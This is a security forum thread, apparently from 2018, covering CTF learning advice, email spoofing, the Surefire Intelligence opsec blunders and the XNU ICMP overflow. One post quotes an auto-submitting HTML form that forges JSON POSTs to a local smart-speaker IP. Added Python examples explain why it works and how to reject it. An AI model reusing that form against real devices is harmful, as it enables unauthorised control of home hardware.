  • Locked thread
Wasabi the J
Jan 23, 2008

MOM WAS RIGHT
I have sec+ 401 or whatever and after lurking this thread for like five minutes a year or so ago, I felt completely uneducated.

Where do I go to like... Learn this poo poo? I felt like all my training is teaching me how to cram for a test, not how things work.

I understand physical security pretty loving well, thankfully.


CRIP EATIN BREAD
Jun 24, 2002

Hey stop worrying bout my acting bitch, and worry about your WACK ass music. In the mean time... Eat a hot bowl of Dicks! Ice T



Soiled Meat
you gotta get knee deep into things and get your hands dirty. training can get you started but just going into various certifications won't do you any good.

the same can be said for pretty much every field in the world.

spankmeister
Jun 15, 2008






Learn by doing. Do online challenges, participate in CTFs, download vulnerable VMs from vulnhub and try to hack them.

As for trainings, OSCP is good because you basically have to hack into a network.

Kuvo
Oct 27, 2008

Blame it on the misfortune of your bark!
Fun Shoe
this count as a security fuckup?

https://news.vice.com/en_us/article/xw9n3q/we-posed-as-100-senators-to-run-ads-on-facebook-facebook-approved-all-of-them

quote:

One of Facebook’s major efforts to add transparency to political advertisements is a required “Paid for by” disclosure at the top of each ad supposedly telling users who is paying for political ads that show up in their news feeds.

But on the eve of the 2018 midterm elections, a VICE News investigation found the “Paid for by” feature is easily manipulated and appears to allow anyone to lie about who is paying for a political ad, or to pose as someone paying for the ad.

To test it, VICE News applied to buy fake ads on behalf of all 100 sitting U.S. senators, including ads “Paid for by” by Mitch McConnell and Chuck Schumer. Facebook’s approvals were bipartisan: All 100 sailed through the system, indicating that just about anyone can buy an ad identified as “Paid for by” by a major U.S. politician.

evil_bunnY
Apr 2, 2003

Angela Merkle Tree posted:

browsers are pieces of poo poo and the same-origin policy isn't gonna save you
code:
<body onload="document.forms[0].submit()">
  <iframe name="iframe" width=0 height=0></iframe>
  <form method='POST' enctype='text/plain' target="iframe" action="http://local-google-home-ip">
    <input name='{"json": "value' value='"}'>
  </form>
</body>
Jesus loving Christ why
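
Why the quoted form gets through, and a server-side check that rejects it, as an added example (not code from the thread or from any vendor): with `enctype='text/plain'` the browser sends `name=value` unescaped, so the body parses as JSON, and the POST counts as a CORS "simple request" that is sent without a preflight. The address `192.0.2.10`, the name `attacker.example` and the `accept_request` policy are assumptions made for illustration.

```python
import json

def text_plain_body(fields):
    """Serialise form fields the way a browser does for enctype=text/plain:
    one name=value pair per line, CRLF-terminated, with no escaping."""
    return "".join(f"{name}={value}\r\n" for name, value in fields)

def accept_request(headers, body, allowed_hosts):
    """Hypothetical policy for a LAN device's HTTP API. Returns (ok, reason)."""
    h = {k.lower(): v for k, v in headers.items()}
    # Host must be a name or IP the device really serves; this also
    # defeats DNS rebinding, where Host carries the outside page's domain.
    if h.get("host", "").lower() not in allowed_hosts:
        return False, "unexpected Host"
    # Browsers attach Origin to cross-site POSTs; refuse foreign origins
    # (including the literal "null" sent from sandboxed contexts).
    origin = h.get("origin")
    if origin is not None and origin.split("://", 1)[-1].lower() not in allowed_hosts:
        return False, "cross-origin request"
    # text/plain is a "simple" content type, so no preflight protects the API.
    # Requiring application/json forces one, and an HTML form cannot send it.
    ctype = h.get("content-type", "").split(";", 1)[0].strip().lower()
    if ctype != "application/json":
        return False, "Content-Type must be application/json"
    try:
        json.loads(body)
    except ValueError:
        return False, "body is not JSON"
    return True, "ok"

# Field name and value copied from the form quoted above.
FORGED_BODY = text_plain_body([('{"json": "value', '"}')])
ALLOWED = {"192.0.2.10"}  # constructed device address (documentation range)

if __name__ == "__main__":
    print(repr(FORGED_BODY), json.loads(FORGED_BODY))
    forged = {"Host": "192.0.2.10", "Origin": "http://attacker.example",
              "Content-Type": "text/plain"}
    print(accept_request(forged, FORGED_BODY, ALLOWED))
```

The content-type check matters on its own because not every client sends `Origin`; with it missing, the forged request is still refused.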

BlankSystemDaemon
Mar 13, 2009




Does "Where Did I Leave My Keys?: Lessons from the Juniper Dual EC Incident" [pdf] count as a secfuck?

BlankSystemDaemon
Mar 13, 2009




And if that's not secfuck, then this is secfuck of the opsec variety.

dpkg chopra
Jun 9, 2007

Fast Food Fight

Grimey Drawer
Bank of America spoofs the from address to look like the account owner when sending a payment notification because apparently email being a broken piece poo poo is a feature not a bug

yes I did find this out after replying to that email with a bunch of sensitive client info why do you ask

(like, it’s fine obvs, it just got bounced back but jfc)

Subjunctive
Sep 12, 2006

✨sparkle and shine✨

Ur Getting Fatter posted:

Bank of America spoofs the from address to look like the account owner when sending a payment notification because apparently email being a broken piece poo poo is a feature not a bug

yes I did find this out after replying to that email with a bunch of sensitive client info why do you ask

(like, it’s fine obvs, it just got bounced back but jfc)

you didn’t check the signature?

dpkg chopra
Jun 9, 2007

Fast Food Fight

Grimey Drawer

Subjunctive posted:

you didn’t check the signature?
this client has his own lovely email server that doesn’t use tls in tyool 2018

if you mean a regular email signature (“John Doe - CEO of poo poo Co LLC”) he doesn’t use those either.

also I was tired and hungry and wanted to go home and just blindly clicked at the last email of him I could find (the sec fuckup is me)

pseudorandom name
May 6, 2007


Jacob Wohl aspires to be a security fuckup.

anthonypants
May 6, 2007

by Nyc_Tattoo
Dinosaur Gum

pseudorandom name posted:

Jacob Wohl aspires to be a security fuckup.
there's a thread about his whole "ex-mossad" private investigator firm https://twitter.com/AricToler/status/1057352982768074753

kid thought he could trick reverse image search by making black & white photos

post hole digger
Mar 21, 2011


lol https://securitytrails.com/domain/surefireintelligence.com/history/soa

Subjunctive
Sep 12, 2006

✨sparkle and shine✨

the Surefire thing is incredible

post hole digger
Mar 21, 2011

anthonypants posted:

there's a thread about his whole "ex-mossad" private investigator firm https://twitter.com/AricToler/status/1057352982768074753

kid thought he could trick reverse image search by making black & white photos

oh theres a securitytrails link in there too. the funniest thing about the pics to me is ratcheting the filters and contrast up on them so a bunch of ~"High Level Security Executives"~ have pictures that look like theyd be band photos in a TSOL album insert. real normal thing for an Professional Adult to do.

pr0digal
Sep 12, 2008

Alan Rickman Overdrive
Ah I see he's following the "don't act like your cover is blown" strategy, let's see if it pays off.

https://twitter.com/JacobAWohl/status/1057377866713751552

Fun fact: the article doesn't have the docs anymore and replaced it with this.

quote:

Earlier today we were given information on accusations against former FBI Director Robert Mueller.

We took the documents down and we are currently investigating these accusations.

There are also very serious allegations against Jacob Wohl.
We are also looking into this.

:allears:

Powered Descent
Jul 13, 2008

We haven't had that spirit here since 1969.

Subjunctive posted:

the Surefire thing is incredible

I wonder if the flashlight company will sue.

Munkeymon
Aug 14, 2003

Motherfucker's got an
armor-piercing crowbar! Rigoddamndicu𝜆ous.



the funniest thing is that the number Surefire, the company A Whol totally does not have anything to do with, has/had on their site rings up his mom

Lutha Mahtin
Oct 10, 2010

Your brokebrain sin is absolved...go and shitpost no more!


this has been my favorite news story of the day

https://www.nbcnews.com/politics/justice-department/mueller-refers-sex-assault-scheme-targeting-him-fbi-investigation-n926301

quote:

Krassenstein and other journalists also pointed to Jacob Wohl, a disgraced hedge fund manager turned pro-Trump conspiracy theorist and Surefire Intelligence, a company connected to him, as being involved with Burkman's alleged plot.

"I gave Burkman a call. I wanted to know who 'Surefire Intelligence' is. That's when he told me about Jacob Wohl," said Krassenstein. "To me, this was all a setup from somebody trying to discredit the media."

Early this morning, Wohl tweeted, "Several media sources tell me that a scandalous story about Mueller is breaking tomorrow. Should be interesting. Stay tuned!"

Reached by direct message on Twitter, Wohl denied having a hand in any plot to pay women making false allegations against Mueller. "I don't have any involvement in any investigations of any kind. I'm not quite that cool," he said.

The allegations still took off as far-right news sites tied to Wohl and known for spreading fake news and disinformation published viral posts. Gateway Pundit, where Wohl is employed as a writer, touted their "exclusive documents" about a "very credible witness."

Wohl declined to comment on his involvement with Surefire Intelligence. However, his email is listed in the domain records for Surefire Intelligence's website and calls to a number listed on the Surefire Intelligence website went to a voicemail message which provided another phone number, listed in public records as belonging to Wohl's mother.

Wohl stopped responding to NBC News after being told Surefire's official phone number redirects to his mother's voicemail.

also

https://twitter.com/lachlan/status/1057368046199816193

finally, jacob wohl is notable for being the youngest person ever to be barred for life from working in the US financial industry. he managed to do this when he was all of nineteen

anthonypants
May 6, 2007

by Nyc_Tattoo
Dinosaur Gum

Lutha Mahtin posted:

finally, jacob wohl is notable for being the youngest person ever to be barred for life from working in the US financial industry. he managed to do this when he was all of nineteen
holy poo poo lmao

Shame Boy
Mar 2, 2010

Ur Getting Fatter posted:

Bank of America spoofs the from address to look like the account owner when sending a payment notification because apparently email being a broken piece poo poo is a feature not a bug

yes I did find this out after replying to that email with a bunch of sensitive client info why do you ask

(like, it’s fine obvs, it just got bounced back but jfc)

does it actually spoof the from address header or does it show up as "from us on behalf of whoever" because that's a separate header that does that and it's how you're "supposed" to do it. barely anyone ever uses it though, generally for dumb reasons - at my last job it was because "spoofing it from their actual address is more personalized and people like it!!!"

do people also like having their email blackholed constantly because we're sending mail from domains we don't own, huh? do they motherfucker? gently caress you
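
The distinction drawn in the post above, between a rewritten From header and a separate Sender header, can be checked mechanically. This is an added example, not code from the thread; the messages are constructed, and `bank.example`, `client.example` and `payee.example` are placeholder domains.

```python
from email import message_from_string
from email.utils import parseaddr

def domain_of(header_value):
    """Domain of the first address in a header, lower-cased ('' if absent)."""
    return parseaddr(header_value or "")[1].rpartition("@")[2].lower()

def same_org(domain, org):
    # Simplification: real DMARC alignment uses the Public Suffix List.
    return domain == org or domain.endswith("." + org)

def classify(raw, sending_org):
    """How does mail transmitted by sending_org name the person it is about?"""
    msg = message_from_string(raw)
    if same_org(domain_of(msg["From"]), sending_org):
        return "own-domain"      # From is a domain the sender controls
    if same_org(domain_of(msg["Sender"]), sending_org):
        return "on-behalf-of"    # RFC 5322 Sender names the real transmitter
    return "spoofed-from"        # third-party From, nothing says who sent it

# DMARC evaluates only the From domain, so the last two cases both depend on
# the policy client.example publishes; only "own-domain" is under the
# sender's control.

# Constructed sample messages.
SPOOFED = ("From: Account Owner <owner@client.example>\n"
           "To: payee@payee.example\nSubject: Payment sent\n\nbody\n")
ON_BEHALF = ("From: Account Owner <owner@client.example>\n"
             "Sender: notifications@mail.bank.example\n"
             "To: payee@payee.example\nSubject: Payment sent\n\nbody\n")
OWN_DOMAIN = ('From: "Account Owner via Bank" <notifications@bank.example>\n'
              "Reply-To: owner@client.example\n"
              "To: payee@payee.example\nSubject: Payment sent\n\nbody\n")

if __name__ == "__main__":
    for name, raw in [("spoofed", SPOOFED), ("on-behalf", ON_BEHALF),
                      ("own-domain", OWN_DOMAIN)]:
        print(name, "->", classify(raw, "bank.example"))
```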

Kuvo
Oct 27, 2008

Blame it on the misfortune of your bark!
Fun Shoe
you forgot the part where he registered the website domain under his own name

https://twitter.com/HoarseWisperer/status/1057340080107470848

or the part where he used his own google account

https://twitter.com/SpeedflyChris/status/1057365216214822913

or the part where he accused mueller of the assault on a day where he had an incredibly strong alibi

https://twitter.com/thetomzone/status/1057383937893416962

Kuvo
Oct 27, 2008

Blame it on the misfortune of your bark!
Fun Shoe
sorry if this isnt sec fuckup enough but its incredibly funny

Midjack
Dec 24, 2007



Kuvo posted:

you forgot the part where he registered the website domain under his own name

https://twitter.com/HoarseWisperer/status/1057340080107470848

or the part where he used his own google account

https://twitter.com/SpeedflyChris/status/1057365216214822913

or the part where he accused mueller of the assault on a day where he had an incredibly strong alibi

https://twitter.com/thetomzone/status/1057383937893416962

lmao at all this but especially the last one

anthonypants
May 6, 2007

by Nyc_Tattoo
Dinosaur Gum

Kuvo posted:

sorry if this isnt sec fuckup enough but its incredibly funny
the nfa complaint has even less to do with secfuck but is also incredibly funny https://www.nfa.futures.org/basicnet/CaseDocument.aspx?seqnum=4346

Volmarias
Dec 31, 2002

EMAIL... THE INTERNET... SEARCH ENGINES...

quote:

Wohl stopped responding to NBC News after being told Surefire's official phone number redirects to his mother's voicemail. 

This will never not be the best part.

Lutha Mahtin
Oct 10, 2010

Your brokebrain sin is absolved...go and shitpost no more!

it's pretty funny that nearly every boring journeyman political reporter in the US is now an opsec genius. at least, they're geniuses compared to the bumbling trumpers they report on

influx.
Dec 16, 2007

Nice pants!

Lutha Mahtin posted:

security is hard and we're all terrible at it imo

Shame Boy
Mar 2, 2010

Volmarias posted:

This will never not be the best part.

dammit mom i told you to pick up the phone if anyone calls and pretend to be my receptionist, ugh i can't wait until i'm old enough to move out!!

Agile Vector
May 21, 2007

scrum bored



Shame Boy posted:

dammit mom i told you to pick up the phone if anyone calls and pretend to be my receptionist, ugh i can't wait until i'm old enough to move out!!

*jacob comes shuffling out the bathroom frantically shouting his companys name before collapsing as it goes to voicemail*

Stanley Pain
Jun 16, 2001

by Fluffdaddy
a surefire way of getting pwned...

Proteus Jones
Feb 28, 2013



https://twitter.com/yoyoha/status/1057424007887286273

Pile Of Garbage
May 28, 2007



ok that's probably the line for wohl chat

Stymie
Jan 9, 2001

by LITERALLY AN ADMIN
as amusing as this all is, it's going to be mighty embarrassing later when the mueller investigation wraps up without any significant impact on the trump admin

Salt Fish
Sep 11, 2003

Cybernetic Crumb
Has anyone worked with CIS before? Do they publish an open set of standards or is it more of a 'buy our services' thing?

Dr. Kayak Paddle
May 10, 2006

Salt Fish posted:

Has anyone worked with CIS before? Do they publish an open set of standards or is it more of a 'buy our services' thing?

I use it for reference for some Palo Alto and AWS things. AFAIK you can join and view all of them (the benchmarks) for free.

https://www.cisecurity.org/cybersecurity-tools/
There is a reference of free vs paid things

Dr. Kayak Paddle fucked around with this message at 23:59 on Oct 31, 2018

post hole digger
Mar 21, 2011

https://lgtm.com/blog/apple_xnu_icmp_error_CVE-2018-4407
:thunk:

quote:

This post is about a heap buffer overflow vulnerability which I found in Apple's XNU operating system kernel. I have written a proof-of-concept exploit which can reboot any Mac or iOS device on the same network, without any user interaction. Apple have classified this vulnerability as a remote code execution vulnerability in the kernel, because it may be possible to exploit the buffer overflow to execute arbitrary code in the kernel.

The following operating system versions and devices are vulnerable:

Apple iOS 11 and earlier: all devices (upgrade to iOS 12)
Apple macOS High Sierra, up to and including 10.13.6: all devices (patched in security update 2018-001)
Apple macOS Sierra, up to and including 10.12.6: all devices (patched in security update 2018-005)
Apple OS X El Capitan and earlier: all devices

The vulnerability is a heap buffer overflow in the networking code in the XNU operating system kernel. XNU is used by both iOS and macOS, which is why iPhones, iPads, and Macbooks are all affected. To trigger the vulnerability, an attacker merely needs to send a malicious IP packet to the IP address of the target device. No user interaction is required. The attacker only needs to be connected to the same network as the target device. For example, if you are using the free WiFi in a coffee shop then an attacker can join the same WiFi network and send a malicious packet to your device. (If an attacker is on the same network as you, it is easy for them to discover your device's IP address using nmap.) To make matters worse, the vulnerability is in such a fundamental part of the networking code that anti-virus software will not protect you: I tested the vulnerability on a Mac running McAfee® Endpoint Security for Mac and it made no difference. It also doesn't matter what software you are running on the device - the malicious packet will still trigger the vulnerability even if you don't have any ports open.

evil_bunnY
Apr 2, 2003

https://twitter.com/ihackbanme/status/1057811965945376768?s=21

Potato Salad
Oct 23, 2014

nobody cares


itt:

-wannabe undercover super information broker whose opsec is worse than a shitling tier highsec EvE corp

-apple being magnificently bad


Proteus Jones
Feb 28, 2013



https://arstechnica.com/information-technology/2018/11/bluetooth-bugs-bite-millions-of-wi-fi-aps-from-cisco-meraki-and-aruba/
